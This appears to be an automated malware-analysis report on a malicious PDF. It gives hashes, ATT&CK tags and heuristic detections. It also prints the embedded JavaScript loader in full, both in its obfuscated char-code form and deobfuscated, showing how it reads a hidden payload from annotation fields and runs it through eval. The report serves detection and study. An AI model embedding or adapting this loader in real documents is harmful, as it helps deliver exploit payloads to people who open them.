PDF malware analysis — malicious · 40072baba02263c8

MALICIOUS

PDF

9.0 KB First seen: 2026-05-08

MD5: 5f6d90f42d52a3dbbec7eafb42db9027 SHA-1: 9914019cfe4992b8e4027d7384119a6ea2e60733 SHA-256: 40072baba02263c88ee9423dce9a0a3d239a5e781691e0fb34b8f8320a49bdc0

124 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 JavaScript/JScript T1204.002 Malicious File

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings related to PDF JavaScript actions and streams. The deobfuscated JavaScript, 'numeric_charcode_stage_000.js', suggests an attempt to execute code, likely to download and run a second-stage payload. The specific obfuscation techniques and the use of `String.fromCharCode` point towards a malicious intent, though the exact payload could not be determined.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 5

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN

PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0005_000.js`	pdf-javascript-stream	PDF /JS object 5 at offset 0x107	1846 bytes
SHA-256: `dffd4a0bf7c27359dc044af43520c0c64cc81b30e4b643f160fdbd9fe73cf727`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script sourceCode = "13,10,118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,118,97,114,32,112,114,111,99,32,61,32,34,37,34,59,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,109,47,41,59,13,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,117,110,101,115,99,97,112,101,40,112,114,111,99,32,43,13,10,9,9,9,97,114,114,91,105,93,41,59,13,10,9,125,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,32,123,13,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,9,97,112,112,91,102,110,99,93,40,98,117,102,41,59,13,10,125,13,10"; function decrypt(str, jump){ var result = ""; var list = str.split(','); for (var i=0; i < list.length; i++) { result += String.fromCharCode(list[i] - jump); } return result; }
`numeric_charcode_stage_000.js`	deobfuscated-js	numeric char-code string decoded JavaScript at offset 0x115	481 bytes
SHA-256: `f9b4659beaf681d266cfb5046d495e7b144d406eff72e71ecd4d1451ae25ca11`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var pr = null; var fnc = 'ev'; var sum = ''; app.doc.syncAnnotScan(); if (app.plugIns.length != 0) { var num = 1; pr = app.doc.getAnnots( { nPage: 0 } ); sum = pr[num].subject; } var buf = ""; if (app.plugIns.length > 3) { var proc = "%"; fnc += 'a'; var arr = sum.split(/m/); for (var i = 1; i < arr.length; i++) { buf += unescape(proc + arr[i]); } } if (app.plugIns.length >= 2) { fnc += 'l'; app[fnc](buf); }

Open this report in the interactive analyzer, or submit your own file for analysis.